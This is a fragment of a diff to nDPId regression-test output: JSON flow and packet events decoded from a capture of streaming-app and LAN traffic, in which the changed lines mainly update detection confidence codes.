+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1447,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385127293,"flow_last_seen":1654385127293,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":270,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1654385127293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"cgi.connect.qq.com","url":"cgi.connect.qq.com\/qqconnectopen\/openapi\/policy_conf?status_os=11&status_version=30&status_machine=sdk_gphone_x86&sdkp=a&sdkv=3.1.0.lite&appid=100258135","code":0,"content_type":"","user_agent":"AndroidSDK_30_generic_x86_arm_11"}} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1654385127425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":330,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":330,"pkt_l4_len":296,"thread_ts_msec":1654385127425,"pkt":"nLbQ0+MztKXvZygQCABFAAE8FLJAADQGv1GhdQ0dwKgCfgBQuH6HV\/ck7YrZ+IAYAOvWowAAAQEICpcQ45e6xeF1SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNToyNyBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KTGFzdC1Nb2RpZmllZDogTW9uLCAwMyBGZWIgMjAyMCAwNDoyODozNSBHTVQNCkVUYWc6ICI1ZTM3YTE3My05Ig0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KMWt4dW4uY29t"} 
01075{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1654385127488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":518,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":518,"pkt_l4_len":484,"thread_ts_msec":1654385127488,"pkt":"nLbQ0+MztKXvZygQCABFAAH47MNAADEGquaB4mtNwKgCfgBQoK5\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"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":880,"flow_max_l4_payload_len":880,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":880,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1654385128878,"pkt":"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"} 
-01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":880,"flow_max_l4_payload_len":880,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":880,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/homePageVideoCollections\/HomePageBanners?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":880,"flow_max_l4_payload_len":880,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":880,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/homePageVideoCollections\/HomePageBanners?_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":871,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":871,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":937,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":937,"pkt_l4_len":903,"thread_ts_msec":1654385128878,"pkt":"tKXvZygQnLbQ0+MzCABFAAObJTNAAEAGoHHAqAJ+oXUNHbieAFDTi3nFmPV9m4AYAfZ1RgAAAQEICrrF59eXEOkZR0VUIC92aWRlb19rYW5rYW5fdGFncy92Mi9hcGkvbWVzc2FnZXM\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"} 
-01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":871,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":871,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/messages?min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104381217,"flow_last_seen":1470104426277,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399652,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} +01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385128878,"flow_last_seen":1654385128878,"flow_idle_time":7580000,"flow_min_l4_payload_len":871,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":871,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/video_kankan_tags\/v2\/api\/messages?min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104381217,"flow_last_seen":1470104426277,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399652,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104378045,"flow_last_seen":1470104423102,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
